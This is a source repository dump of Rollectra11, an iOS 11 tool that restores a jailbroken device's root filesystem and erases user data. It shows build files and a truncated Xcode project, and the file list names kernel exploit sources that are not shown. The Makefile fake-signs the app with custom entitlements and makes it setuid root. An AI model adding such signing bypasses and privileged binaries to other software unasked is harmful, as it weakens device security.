├── .gitignore ├── .gitmodules ├── Makefile ├── README.md ├── Rollectra-1.1.ipa ├── Rollectra.xcodeproj ├── project.pbxproj ├── project.xcworkspace │ ├── contents.xcworkspacedata │ └── xcshareddata │ │ └── IDEWorkspaceChecks.plist └── xcuserdata │ └── pwn20wnd.xcuserdatad │ └── xcschemes │ └── xcschememanagement.plist ├── Rollectra ├── AppDelegate.h ├── AppDelegate.m ├── AppIcon20x20.png ├── AppIcon20x20@2x.png ├── AppIcon20x20@3x.png ├── AppIcon29x29.png ├── AppIcon29x29@2x.png ├── AppIcon29x29@3x.png ├── AppIcon40x40.png ├── AppIcon40x40@2x.png ├── AppIcon40x40@3x.png ├── AppIcon60x60@2x.png ├── AppIcon60x60@3x.png ├── AppIcon76x76.png ├── AppIcon76x76@2x.png ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── Combined Shape.png ├── Combined Shape@2x.png ├── Combined Shape@3x.png ├── Info.plist ├── QiLin.h ├── README ├── RollectraGradientView.h ├── RollectraGradientView.m ├── SpringBoardServices.framework │ └── SpringBoardServices.tbd ├── ViewController.h ├── ViewController.m ├── common.h ├── iokit.h ├── kmem.c ├── kmem.h ├── main.m ├── offsets.h ├── offsets.m ├── qilin.o ├── sploit.c └── sploit.h ├── com.pwn20wnd.semirestore11_1.1-1_iphoneos-arm.deb ├── com.pwn20wnd.semirestore11_1.2-1_iphoneos-arm.deb ├── entitlements.xml └── layout └── DEBIAN ├── control ├── postinst └── postrm /.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | ## Obj-C/Swift 
specific 26 | *.hmap 27 | # *.ipa 28 | *.dSYM.zip 29 | *.dSYM 30 | 31 | # CocoaPods 32 | # 33 | # We recommend against adding the Pods directory to your .gitignore. However 34 | # you should judge for yourself, the pros and cons are mentioned at: 35 | # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control 36 | # 37 | # Pods/ 38 | # 39 | # Add this line if you want to avoid checking in source code from the Xcode workspace 40 | # *.xcworkspace 41 | 42 | # Carthage 43 | # 44 | # Add this line if you want to avoid checking in source code from Carthage dependencies. 45 | # Carthage/Checkouts 46 | 47 | Carthage/Build 48 | 49 | # fastlane 50 | # 51 | # It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the 52 | # screenshots whenever they are needed. 53 | # For more information about the recommended setup visit: 54 | # https://docs.fastlane.tools/best-practices/source-control/#source-control 55 | 56 | fastlane/report.xml 57 | fastlane/Preview.html 58 | fastlane/screenshots/**/*.png 59 | fastlane/test_output 60 | 61 | # Code Injection 62 | # 63 | # After new code Injection tools there's a generated folder /iOSInjectionProject 64 | # https://github.com/johnno1962/injectionforxcode 65 | 66 | iOSInjectionProject/ 67 | # General 68 | .DS_Store 69 | .AppleDouble 70 | .LSOverride 71 | 72 | # Icon must end with two \r 73 | Icon 74 | 75 | 76 | # Thumbnails 77 | ._* 78 | 79 | # Files that might appear in the root of a volume 80 | .DocumentRevisions-V100 81 | .fseventsd 82 | .Spotlight-V100 83 | .TemporaryItems 84 | .Trashes 85 | .VolumeIcon.icns 86 | .com.apple.timemachine.donotpresent 87 | 88 | # Directories potentially created on remote AFP share 89 | .AppleDB 90 | .AppleDesktop 91 | Network Trash Folder 92 | Temporary Items 93 | .apdisk 94 | 95 | -------------------------------------------------------------------------------- /.gitmodules: 
-------------------------------------------------------------------------------- 1 | [submodule "theos"] 2 | path = theos 3 | url = https://github.com/theos/theos.git 4 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | THEOS=./theos 2 | DEBUG=0 3 | THEOS_DEVICE_IP=127.0.0.1 4 | THEOS_DEVICE_PORT=2222 5 | 6 | include $(THEOS)/makefiles/common.mk 7 | 8 | stage:: 9 | mkdir $(THEOS_STAGING_DIR)/Applications 10 | xcodebuild -arch arm64 -sdk iphoneos CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO OTHER_CFLAGS="-DWANT_CYDIA" OTHER_CPLUSPLUSFLAGS="-DWANT_CYDIA" PRODUCT_BUNDLE_IDENTIFIER="science.xnu.rollectra" OTHER_LDFLAGS="-framework IOKit" # built unsigned here and fake-signed by ldid below; -DWANT_CYDIA selects the Cydia build (the Xcode project's own configs build the "-jailed" bundle id without it) 11 | strip ./build/Release-iphoneos/Rollectra.app/Rollectra 12 | ldid -Sentitlements.xml ./build/Release-iphoneos/Rollectra.app/Rollectra # ldid fake-signs the binary and grants it the entitlements listed in entitlements.xml; a change to that file changes what the installed binary may do 13 | cp -r ./build/Release-iphoneos/Rollectra.app $(THEOS_STAGING_DIR)/Applications/Rollectra.app 14 | chmod 6755 $(THEOS_STAGING_DIR)/Applications/Rollectra.app/Rollectra # 6755 = setuid+setgid: once installed the binary runs with its owner's privileges (presumably root, which restoring the RootFS needs), so every bug in it is a privileged one 15 | 16 | clean:: 17 | rm -rf ./build 18 | 19 | include $(THEOS_MAKE_PATH)/null.mk 20 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Rollectra11 2 | Using this tool will restore the RootFS to its stock state and reset the user data. 3 | So creating a backup using iTunes before using it is recommended. 4 | The Cydia version supports all devices running iOS 11.0 to 11.4 Beta 3. 5 | The Jailed version supports all devices running iOS 11.3 to 11.4 Beta 3. 6 | ~~The 11.2 to 11.2.6 support will be coming really soon.~~ 7 | The 11.2 to 11.2.6 support has been added to the Cydia version. 8 | ~~The 11.0 to 11.1.2 support will also be added in the near future.~~ 9 | The 11.0 to 11.1.2 support was also added to the Cydia version. 
10 | Although there is an option to skip the full restore and keep the user data, I really would not recommend it, since it leaves a lot of leftovers from your jailbreak. 11 | Follow me at @Pwn20wnd for future updates about this tool or to troubleshoot any unexpected behavior you may run into with it. 12 | -------------------------------------------------------------------------------- /Rollectra-1.1.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra-1.1.ipa -------------------------------------------------------------------------------- /Rollectra.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 50; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 21C0FC6C21369EB700849420 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6B21369EB700849420 /* AppDelegate.m */; }; 11 | 21C0FC7221369EB700849420 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7021369EB700849420 /* Main.storyboard */; }; 12 | 21C0FC7421369EB800849420 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7321369EB800849420 /* Assets.xcassets */; }; 13 | 21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */; }; 14 | 21C0FC7A21369EB800849420 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC7921369EB800849420 /* main.m */; }; 15 | 21C0FC8721369EE900849420 /* kmem.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8021369EE900849420 /* kmem.c */; }; 16 | 21C0FC8821369EE900849420 /* README in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC8421369EE900849420 /* README */; }; 17 | 
21C0FC8921369EE900849420 /* sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8521369EE900849420 /* sploit.c */; }; 18 | 21C0FC8A21369EE900849420 /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* offsets.m */; }; 19 | 21C0FC912136A46500849420 /* SpringBoardServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21C0FC902136A46500849420 /* SpringBoardServices.framework */; }; 20 | 21C0FC972136E25D00849420 /* Combined Shape@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC942136E25D00849420 /* Combined Shape@3x.png */; }; 21 | 21C0FC982136E25D00849420 /* Combined Shape.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC952136E25D00849420 /* Combined Shape.png */; }; 22 | 21C0FC992136E25D00849420 /* Combined Shape@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC962136E25D00849420 /* Combined Shape@2x.png */; }; 23 | 21C0FC9C2136E29100849420 /* RollectraGradientView.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC9A2136E29100849420 /* RollectraGradientView.m */; }; 24 | 21C0FC9F2136FC5300849420 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* ViewController.m */; }; 25 | 21C0FCAD2137117B00849420 /* AppIcon20x20@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA02137117900849420 /* AppIcon20x20@3x.png */; }; 26 | 21C0FCAE2137117B00849420 /* AppIcon60x60@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA12137117900849420 /* AppIcon60x60@3x.png */; }; 27 | 21C0FCAF2137117B00849420 /* AppIcon76x76.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA22137117A00849420 /* AppIcon76x76.png */; }; 28 | 21C0FCB02137117B00849420 /* AppIcon76x76@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA32137117A00849420 /* AppIcon76x76@2x.png */; }; 29 | 21C0FCB12137117B00849420 /* AppIcon60x60@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA42137117A00849420 /* 
AppIcon60x60@2x.png */; }; 30 | 21C0FCB22137117B00849420 /* AppIcon40x40@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA52137117A00849420 /* AppIcon40x40@3x.png */; }; 31 | 21C0FCB32137117B00849420 /* AppIcon29x29.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA62137117A00849420 /* AppIcon29x29.png */; }; 32 | 21C0FCB42137117B00849420 /* AppIcon29x29@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA72137117A00849420 /* AppIcon29x29@2x.png */; }; 33 | 21C0FCB52137117B00849420 /* AppIcon29x29@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA82137117A00849420 /* AppIcon29x29@3x.png */; }; 34 | 21C0FCB62137117B00849420 /* AppIcon40x40.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA92137117B00849420 /* AppIcon40x40.png */; }; 35 | 21C0FCB72137117B00849420 /* AppIcon40x40@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCAA2137117B00849420 /* AppIcon40x40@2x.png */; }; 36 | 21C0FCB82137117B00849420 /* AppIcon20x20@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCAB2137117B00849420 /* AppIcon20x20@2x.png */; }; 37 | 21C0FCB92137117B00849420 /* AppIcon20x20.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCAC2137117B00849420 /* AppIcon20x20.png */; }; 38 | /* End PBXBuildFile section */ 39 | 40 | /* Begin PBXFileReference section */ 41 | 21C0FC6721369EB700849420 /* Rollectra.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Rollectra.app; sourceTree = BUILT_PRODUCTS_DIR; }; 42 | 21C0FC6A21369EB700849420 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 43 | 21C0FC6B21369EB700849420 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 44 | 21C0FC6D21369EB700849420 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; 
sourceTree = ""; }; 45 | 21C0FC6E21369EB700849420 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 46 | 21C0FC7121369EB700849420 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 47 | 21C0FC7321369EB800849420 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 48 | 21C0FC7621369EB800849420 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 49 | 21C0FC7821369EB800849420 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 50 | 21C0FC7921369EB800849420 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 51 | 21C0FC8021369EE900849420 /* kmem.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kmem.c; sourceTree = ""; }; 52 | 21C0FC8121369EE900849420 /* sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sploit.h; sourceTree = ""; }; 53 | 21C0FC8221369EE900849420 /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 54 | 21C0FC8321369EE900849420 /* kmem.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kmem.h; sourceTree = ""; }; 55 | 21C0FC8421369EE900849420 /* README */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = README; sourceTree = ""; }; 56 | 21C0FC8521369EE900849420 /* sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = sploit.c; sourceTree = ""; }; 57 | 21C0FC8621369EE900849420 /* offsets.m */ 
= {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; 58 | 21C0FC8B21369FC500849420 /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 59 | 21C0FC8C2136A0D100849420 /* qilin.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = qilin.o; sourceTree = ""; }; 60 | 21C0FC8D2136A0D100849420 /* QiLin.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = QiLin.h; sourceTree = ""; }; 61 | 21C0FC8F2136A2C500849420 /* iokit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = iokit.h; sourceTree = ""; }; 62 | 21C0FC902136A46500849420 /* SpringBoardServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = SpringBoardServices.framework; sourceTree = ""; }; 63 | 21C0FC942136E25D00849420 /* Combined Shape@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Combined Shape@3x.png"; sourceTree = ""; }; 64 | 21C0FC952136E25D00849420 /* Combined Shape.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Combined Shape.png"; sourceTree = ""; }; 65 | 21C0FC962136E25D00849420 /* Combined Shape@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Combined Shape@2x.png"; sourceTree = ""; }; 66 | 21C0FC9A2136E29100849420 /* RollectraGradientView.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = RollectraGradientView.m; sourceTree = ""; }; 67 | 21C0FC9B2136E29100849420 /* RollectraGradientView.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = RollectraGradientView.h; sourceTree = ""; }; 68 | 21C0FCA02137117900849420 /* AppIcon20x20@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon20x20@3x.png"; sourceTree = ""; }; 69 | 21C0FCA12137117900849420 /* 
AppIcon60x60@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon60x60@3x.png"; sourceTree = ""; }; 70 | 21C0FCA22137117A00849420 /* AppIcon76x76.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon76x76.png; sourceTree = ""; }; 71 | 21C0FCA32137117A00849420 /* AppIcon76x76@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon76x76@2x.png"; sourceTree = ""; }; 72 | 21C0FCA42137117A00849420 /* AppIcon60x60@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon60x60@2x.png"; sourceTree = ""; }; 73 | 21C0FCA52137117A00849420 /* AppIcon40x40@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon40x40@3x.png"; sourceTree = ""; }; 74 | 21C0FCA62137117A00849420 /* AppIcon29x29.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon29x29.png; sourceTree = ""; }; 75 | 21C0FCA72137117A00849420 /* AppIcon29x29@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon29x29@2x.png"; sourceTree = ""; }; 76 | 21C0FCA82137117A00849420 /* AppIcon29x29@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon29x29@3x.png"; sourceTree = ""; }; 77 | 21C0FCA92137117B00849420 /* AppIcon40x40.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon40x40.png; sourceTree = ""; }; 78 | 21C0FCAA2137117B00849420 /* AppIcon40x40@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon40x40@2x.png"; sourceTree = ""; }; 79 | 21C0FCAB2137117B00849420 /* AppIcon20x20@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon20x20@2x.png"; sourceTree = ""; }; 80 | 21C0FCAC2137117B00849420 /* AppIcon20x20.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon20x20.png; sourceTree = ""; }; 81 | /* End PBXFileReference section */ 82 | 83 | /* Begin PBXFrameworksBuildPhase section */ 84 
| 21C0FC6421369EB700849420 /* Frameworks */ = { 85 | isa = PBXFrameworksBuildPhase; 86 | buildActionMask = 2147483647; 87 | files = ( 88 | 21C0FC912136A46500849420 /* SpringBoardServices.framework in Frameworks */, 89 | ); 90 | runOnlyForDeploymentPostprocessing = 0; 91 | }; 92 | /* End PBXFrameworksBuildPhase section */ 93 | 94 | /* Begin PBXGroup section */ 95 | 21C0FC5E21369EB700849420 = { 96 | isa = PBXGroup; 97 | children = ( 98 | 21C0FC6921369EB700849420 /* Rollectra */, 99 | 21C0FC6821369EB700849420 /* Products */, 100 | ); 101 | sourceTree = ""; 102 | }; 103 | 21C0FC6821369EB700849420 /* Products */ = { 104 | isa = PBXGroup; 105 | children = ( 106 | 21C0FC6721369EB700849420 /* Rollectra.app */, 107 | ); 108 | name = Products; 109 | sourceTree = ""; 110 | }; 111 | 21C0FC6921369EB700849420 /* Rollectra */ = { 112 | isa = PBXGroup; 113 | children = ( 114 | 21C0FCAC2137117B00849420 /* AppIcon20x20.png */, 115 | 21C0FCAB2137117B00849420 /* AppIcon20x20@2x.png */, 116 | 21C0FCA02137117900849420 /* AppIcon20x20@3x.png */, 117 | 21C0FCA62137117A00849420 /* AppIcon29x29.png */, 118 | 21C0FCA72137117A00849420 /* AppIcon29x29@2x.png */, 119 | 21C0FCA82137117A00849420 /* AppIcon29x29@3x.png */, 120 | 21C0FCA92137117B00849420 /* AppIcon40x40.png */, 121 | 21C0FCAA2137117B00849420 /* AppIcon40x40@2x.png */, 122 | 21C0FCA52137117A00849420 /* AppIcon40x40@3x.png */, 123 | 21C0FCA42137117A00849420 /* AppIcon60x60@2x.png */, 124 | 21C0FCA12137117900849420 /* AppIcon60x60@3x.png */, 125 | 21C0FCA22137117A00849420 /* AppIcon76x76.png */, 126 | 21C0FCA32137117A00849420 /* AppIcon76x76@2x.png */, 127 | 21C0FC9B2136E29100849420 /* RollectraGradientView.h */, 128 | 21C0FC9A2136E29100849420 /* RollectraGradientView.m */, 129 | 21C0FC952136E25D00849420 /* Combined Shape.png */, 130 | 21C0FC962136E25D00849420 /* Combined Shape@2x.png */, 131 | 21C0FC942136E25D00849420 /* Combined Shape@3x.png */, 132 | 21C0FC902136A46500849420 /* SpringBoardServices.framework */, 133 | 
21C0FC8F2136A2C500849420 /* iokit.h */, 134 | 21C0FC8D2136A0D100849420 /* QiLin.h */, 135 | 21C0FC8C2136A0D100849420 /* qilin.o */, 136 | 21C0FC8B21369FC500849420 /* common.h */, 137 | 21C0FC8021369EE900849420 /* kmem.c */, 138 | 21C0FC8321369EE900849420 /* kmem.h */, 139 | 21C0FC8221369EE900849420 /* offsets.h */, 140 | 21C0FC8621369EE900849420 /* offsets.m */, 141 | 21C0FC8421369EE900849420 /* README */, 142 | 21C0FC8521369EE900849420 /* sploit.c */, 143 | 21C0FC8121369EE900849420 /* sploit.h */, 144 | 21C0FC6A21369EB700849420 /* AppDelegate.h */, 145 | 21C0FC6B21369EB700849420 /* AppDelegate.m */, 146 | 21C0FC6D21369EB700849420 /* ViewController.h */, 147 | 21C0FC6E21369EB700849420 /* ViewController.m */, 148 | 21C0FC7021369EB700849420 /* Main.storyboard */, 149 | 21C0FC7321369EB800849420 /* Assets.xcassets */, 150 | 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */, 151 | 21C0FC7821369EB800849420 /* Info.plist */, 152 | 21C0FC7921369EB800849420 /* main.m */, 153 | ); 154 | path = Rollectra; 155 | sourceTree = ""; 156 | }; 157 | /* End PBXGroup section */ 158 | 159 | /* Begin PBXNativeTarget section */ 160 | 21C0FC6621369EB700849420 /* Rollectra */ = { 161 | isa = PBXNativeTarget; 162 | buildConfigurationList = 21C0FC7D21369EB800849420 /* Build configuration list for PBXNativeTarget "Rollectra" */; 163 | buildPhases = ( 164 | 21C0FC6321369EB700849420 /* Sources */, 165 | 21C0FC6421369EB700849420 /* Frameworks */, 166 | 21C0FC6521369EB700849420 /* Resources */, 167 | ); 168 | buildRules = ( 169 | ); 170 | dependencies = ( 171 | ); 172 | name = Rollectra; 173 | productName = Rollectra; 174 | productReference = 21C0FC6721369EB700849420 /* Rollectra.app */; 175 | productType = "com.apple.product-type.application"; 176 | }; 177 | /* End PBXNativeTarget section */ 178 | 179 | /* Begin PBXProject section */ 180 | 21C0FC5F21369EB700849420 /* Project object */ = { 181 | isa = PBXProject; 182 | attributes = { 183 | LastUpgradeCheck = 0940; 184 | ORGANIZATIONNAME = 
Pwn20wnd; 185 | TargetAttributes = { 186 | 21C0FC6621369EB700849420 = { 187 | CreatedOnToolsVersion = 9.4.1; 188 | }; 189 | }; 190 | }; 191 | buildConfigurationList = 21C0FC6221369EB700849420 /* Build configuration list for PBXProject "Rollectra" */; 192 | compatibilityVersion = "Xcode 9.3"; 193 | developmentRegion = en; 194 | hasScannedForEncodings = 0; 195 | knownRegions = ( 196 | en, 197 | Base, 198 | ); 199 | mainGroup = 21C0FC5E21369EB700849420; 200 | productRefGroup = 21C0FC6821369EB700849420 /* Products */; 201 | projectDirPath = ""; 202 | projectRoot = ""; 203 | targets = ( 204 | 21C0FC6621369EB700849420 /* Rollectra */, 205 | ); 206 | }; 207 | /* End PBXProject section */ 208 | 209 | /* Begin PBXResourcesBuildPhase section */ 210 | 21C0FC6521369EB700849420 /* Resources */ = { 211 | isa = PBXResourcesBuildPhase; 212 | buildActionMask = 2147483647; 213 | files = ( 214 | 21C0FCB72137117B00849420 /* AppIcon40x40@2x.png in Resources */, 215 | 21C0FC8821369EE900849420 /* README in Resources */, 216 | 21C0FCB42137117B00849420 /* AppIcon29x29@2x.png in Resources */, 217 | 21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */, 218 | 21C0FC982136E25D00849420 /* Combined Shape.png in Resources */, 219 | 21C0FCB62137117B00849420 /* AppIcon40x40.png in Resources */, 220 | 21C0FC992136E25D00849420 /* Combined Shape@2x.png in Resources */, 221 | 21C0FC7421369EB800849420 /* Assets.xcassets in Resources */, 222 | 21C0FC7221369EB700849420 /* Main.storyboard in Resources */, 223 | 21C0FCB92137117B00849420 /* AppIcon20x20.png in Resources */, 224 | 21C0FC972136E25D00849420 /* Combined Shape@3x.png in Resources */, 225 | 21C0FCB02137117B00849420 /* AppIcon76x76@2x.png in Resources */, 226 | 21C0FCB52137117B00849420 /* AppIcon29x29@3x.png in Resources */, 227 | 21C0FCB82137117B00849420 /* AppIcon20x20@2x.png in Resources */, 228 | 21C0FCAE2137117B00849420 /* AppIcon60x60@3x.png in Resources */, 229 | 21C0FCAD2137117B00849420 /* AppIcon20x20@3x.png in Resources */, 
230 | 21C0FCB12137117B00849420 /* AppIcon60x60@2x.png in Resources */, 231 | 21C0FCB32137117B00849420 /* AppIcon29x29.png in Resources */, 232 | 21C0FCAF2137117B00849420 /* AppIcon76x76.png in Resources */, 233 | 21C0FCB22137117B00849420 /* AppIcon40x40@3x.png in Resources */, 234 | ); 235 | runOnlyForDeploymentPostprocessing = 0; 236 | }; 237 | /* End PBXResourcesBuildPhase section */ 238 | 239 | /* Begin PBXSourcesBuildPhase section */ 240 | 21C0FC6321369EB700849420 /* Sources */ = { 241 | isa = PBXSourcesBuildPhase; 242 | buildActionMask = 2147483647; 243 | files = ( 244 | 21C0FC9F2136FC5300849420 /* ViewController.m in Sources */, 245 | 21C0FC9C2136E29100849420 /* RollectraGradientView.m in Sources */, 246 | 21C0FC8721369EE900849420 /* kmem.c in Sources */, 247 | 21C0FC7A21369EB800849420 /* main.m in Sources */, 248 | 21C0FC8921369EE900849420 /* sploit.c in Sources */, 249 | 21C0FC8A21369EE900849420 /* offsets.m in Sources */, 250 | 21C0FC6C21369EB700849420 /* AppDelegate.m in Sources */, 251 | ); 252 | runOnlyForDeploymentPostprocessing = 0; 253 | }; 254 | /* End PBXSourcesBuildPhase section */ 255 | 256 | /* Begin PBXVariantGroup section */ 257 | 21C0FC7021369EB700849420 /* Main.storyboard */ = { 258 | isa = PBXVariantGroup; 259 | children = ( 260 | 21C0FC7121369EB700849420 /* Base */, 261 | ); 262 | name = Main.storyboard; 263 | sourceTree = ""; 264 | }; 265 | 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */ = { 266 | isa = PBXVariantGroup; 267 | children = ( 268 | 21C0FC7621369EB800849420 /* Base */, 269 | ); 270 | name = LaunchScreen.storyboard; 271 | sourceTree = ""; 272 | }; 273 | /* End PBXVariantGroup section */ 274 | 275 | /* Begin XCBuildConfiguration section */ 276 | 21C0FC7B21369EB800849420 /* Debug */ = { 277 | isa = XCBuildConfiguration; 278 | buildSettings = { 279 | ALWAYS_SEARCH_USER_PATHS = NO; 280 | CLANG_ANALYZER_NONNULL = YES; 281 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 282 | CLANG_CXX_LANGUAGE_STANDARD = 
"gnu++14"; 283 | CLANG_CXX_LIBRARY = "libc++"; 284 | CLANG_ENABLE_MODULES = YES; 285 | CLANG_ENABLE_OBJC_ARC = YES; 286 | CLANG_ENABLE_OBJC_WEAK = YES; 287 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 288 | CLANG_WARN_BOOL_CONVERSION = YES; 289 | CLANG_WARN_COMMA = YES; 290 | CLANG_WARN_CONSTANT_CONVERSION = YES; 291 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 292 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 293 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 294 | CLANG_WARN_EMPTY_BODY = YES; 295 | CLANG_WARN_ENUM_CONVERSION = YES; 296 | CLANG_WARN_INFINITE_RECURSION = YES; 297 | CLANG_WARN_INT_CONVERSION = YES; 298 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 299 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 300 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 301 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 302 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 303 | CLANG_WARN_STRICT_PROTOTYPES = YES; 304 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 305 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 306 | CLANG_WARN_UNREACHABLE_CODE = YES; 307 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 308 | CODE_SIGN_IDENTITY = "iPhone Developer"; 309 | COPY_PHASE_STRIP = NO; 310 | DEBUG_INFORMATION_FORMAT = dwarf; 311 | ENABLE_STRICT_OBJC_MSGSEND = YES; 312 | ENABLE_TESTABILITY = YES; 313 | GCC_C_LANGUAGE_STANDARD = gnu11; 314 | GCC_DYNAMIC_NO_PIC = NO; 315 | GCC_NO_COMMON_BLOCKS = YES; 316 | GCC_OPTIMIZATION_LEVEL = 